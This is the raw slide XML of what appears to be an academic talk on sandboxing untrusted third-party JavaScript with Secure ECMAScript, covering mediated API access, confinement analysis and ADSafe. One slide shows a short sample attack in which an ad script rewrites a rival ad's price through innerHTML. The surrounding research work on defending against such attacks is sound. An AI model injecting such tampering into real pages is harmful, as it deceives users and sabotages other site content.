              <a:gd name="adj3" fmla="val 16667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254061"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“function(){return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="254061"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="254061"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier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sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="254061"/>
              </a:solidFill>
              <a:latin typeface="Couri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1803976"/>
            <a:ext cx="24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Explicitly list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free variables of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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5135100" y="1803976"/>
            <a:ext cx="1418100" cy="329624"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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200" y="3810000"/>
            <a:ext cx="8517600" cy="137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3464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Run-time restriction: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>)) ⊆{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2600" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,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600" i="1" dirty="0" err="1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2600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n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>}	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Allows an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>upper bound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>on side-effects of executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C0504D"/>
              </a:solidFill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1106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376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0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3600" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600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3600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n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3760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272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buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600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Third-party JavaScript: Security Threat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0403989-3EFF-4C4D-9A9D-F370A7D41F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457200" y="1752600"/>
            <a:ext cx="8077200" cy="4451350"/>
            <a:chOff x="762000" y="1219200"/>
            <a:chExt cx="7669530" cy="4908550"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7" descr="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7669530" cy="4908550"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8" descr="Screen shot 2011-05-30 at 5.00.52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1676400"/>
              <a:ext cx="2438400" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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6324600" y="2514600"/>
              <a:ext cx="1371600" cy="36131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11" name="Picture 10" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315477" y="3581400"/>
            <a:ext cx="14445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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4191000" y="2167214"/>
            <a:ext cx="1895877" cy="531527"/>
            <a:chOff x="4191000" y="2167214"/>
            <a:chExt cx="1895877" cy="531527"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4191000" y="2167214"/>
              <a:ext cx="1723225" cy="531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1" y="2209800"/>
              <a:ext cx="1895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/>
                  <a:cs typeface="Arial"/>
                </a:rPr>
                <a:t>$1 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                </a:rPr>
                <a:t>Buy Now</a:t>
              </a:r>
            </a:p>
            <a:p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78153" y="2743200"/>
            <a:ext cx="5837323" cy="32766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4381502" y="3009901"/>
            <a:ext cx="2057399" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500"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09598" y="4648200"/>
            <a:ext cx="5380825" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36130"/>
              <a:gd name="adj2" fmla="val -1273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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Attack the other ad: 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Change the price !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementById(“sonyAd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>a.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> = “$1 Buy Now”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533399" y="3615298"/>
            <a:ext cx="5638801" cy="1032902"/>
            <a:chOff x="457200" y="2743200"/>
            <a:chExt cx="5638801" cy="1032902"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rounded Rectangle 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="478154" y="2743200"/>
              <a:ext cx="5617847" cy="103290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2773448"/>
              <a:ext cx="5629677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Untrusted third-party JavaScript poses a threat to </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>other third-party components</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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1091624"/>
            <a:ext cx="7620000" cy="5847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"/>
              </a:rPr>
              <a:t>&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>“https://adpublisher.com/ad1.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>”&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>“https:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>//adpublisher.com/ad2.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>”&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Couri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 for 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915400" cy="2209799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3027" dirty="0" smtClean="0"/>
              <a:t>Developed a small-style operational semantics for SES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>based on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 of the EMCA-262 specification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>similar in structure to our semantics of ES3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Formally showed that SES is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lexically scoped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352800"/>
            <a:ext cx="8991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Theorem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>α</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-renaming of bound variables is semantics preserving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Mediated Access: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686800" cy="4724399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Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (SES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sandboxing technique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Confinement analysis technique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Application: Yahoo! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADSafe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Sandboxing for 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634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Much </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simpler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> than our previous sandboxing mechanism!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304800" y="4165937"/>
            <a:ext cx="8458200" cy="1396663"/>
            <a:chOff x="457200" y="3838758"/>
            <a:chExt cx="8458200" cy="1396663"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Manual Operation 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4682014" y="3652544"/>
              <a:ext cx="1303972" cy="1676400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartManualOperati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5372" y="4136117"/>
              <a:ext cx="16430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SES Filter &amp; Rewriter</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200" dirty="0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6481097" y="4304356"/>
              <a:ext cx="910303" cy="36271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0" y="4219758"/>
              <a:ext cx="1219200" cy="461665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457200" y="4219758"/>
              <a:ext cx="2442496" cy="1015663"/>
              <a:chOff x="436716" y="3534728"/>
              <a:chExt cx="2442496" cy="10156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60477" y="3534728"/>
                <a:ext cx="2418735" cy="498928"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:pr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solidFill>
                    <a:schemeClr val="tx1"/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6716" y="3534728"/>
                <a:ext cx="2418735" cy="10156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2400" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent3"/>
                    </a:solidFill>
                    <a:latin typeface="Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>eval(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                    <a:latin typeface="Times"/>
                    <a:cs typeface="Times"/>
                  </a:rPr>
                  <a:t>s</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="9BBB59"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>,</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="376092"/>
                    </a:solidFill>
                    <a:latin typeface="Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>”api</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="376092"/>
                    </a:solidFill>
                    <a:latin typeface="Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>”</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="9BBB59"/>
                    </a:solidFill>
                    <a:latin typeface="Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>)</a:t>
                </a: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 rot="10800000">
              <a:off x="3204497" y="4275308"/>
              <a:ext cx="910303" cy="36271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0" y="468862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Third-party</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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28600" y="1219200"/>
            <a:ext cx="8763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obtains access to ANY protected resource ONLY via the API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2362199"/>
            <a:ext cx="89154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5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</a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-36576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Store API object in variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a: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pi</a:t>
            </a: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</a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-36576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81" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2581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var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2581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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2581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api</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2581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&lt;API&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-36576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Restrict untrusted code so that </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2839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api</a:t>
            </a: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lang="en-US" sz="2839" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0"/>
              <a:t>accessible global</a:t>
            </a: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Mediated Access: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686800" cy="4724399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Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (SES)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Sandboxing technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Confinement analysis technique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Application: Yahoo!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ADSafe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4419600"/>
            <a:ext cx="8686800" cy="9388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API Confinement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: verify that sandboxed code cannot use the API to obtain direct access to a security-critical resource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8600" y="53295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Untrusted code must only be able to write to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>log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Design: Write-only Log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304800" y="1760232"/>
            <a:ext cx="4114800" cy="2583168"/>
            <a:chOff x="-19756" y="2209800"/>
            <a:chExt cx="4648200" cy="3039320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-19756" y="4488656"/>
              <a:ext cx="4648200" cy="76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var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="376092"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> log = </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="376092"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> [&lt;critical&gt;,0,0]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr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496710" y="2209800"/>
              <a:ext cx="1903591" cy="1986525"/>
              <a:chOff x="496710" y="2209800"/>
              <a:chExt cx="1903591" cy="1986525"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="7" name="Group 12"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="496710" y="2209800"/>
                <a:ext cx="1903591" cy="1981201"/>
                <a:chOff x="618791" y="1752600"/>
                <a:chExt cx="1286210" cy="192702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18792" y="1752600"/>
                  <a:ext cx="1286209" cy="1927021"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="25400"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18791" y="2413326"/>
                  <a:ext cx="1286208" cy="1588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18792" y="3086692"/>
                  <a:ext cx="1286208" cy="1817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496711" y="2256015"/>
                <a:ext cx="1903590" cy="43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ourier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>&lt;critical&gt;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6711" y="2973262"/>
                <a:ext cx="1903589" cy="54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0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6711" y="3653136"/>
                <a:ext cx="1903589" cy="54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0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" name="Rounded Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="5029200"/>
            <a:ext cx="6972300" cy="11874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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>log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cs typeface="Calibri"/>
              </a:rPr>
              <a:t> never leaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Sandbox prevents direct access to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log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API only allows data to be written to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log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2792091" y="1295400"/>
            <a:ext cx="6123309" cy="1833265"/>
            <a:chOff x="1991991" y="1295400"/>
            <a:chExt cx="6123309" cy="1833265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3973189" y="1524000"/>
              <a:ext cx="3608711" cy="906691"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -23297"/>
                <a:gd name="adj2" fmla="val 51294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function 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push(x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)</a:t>
              </a:r>
            </a:p>
            <a:p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  {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log.push(x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)}</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="25" idx="1"/>
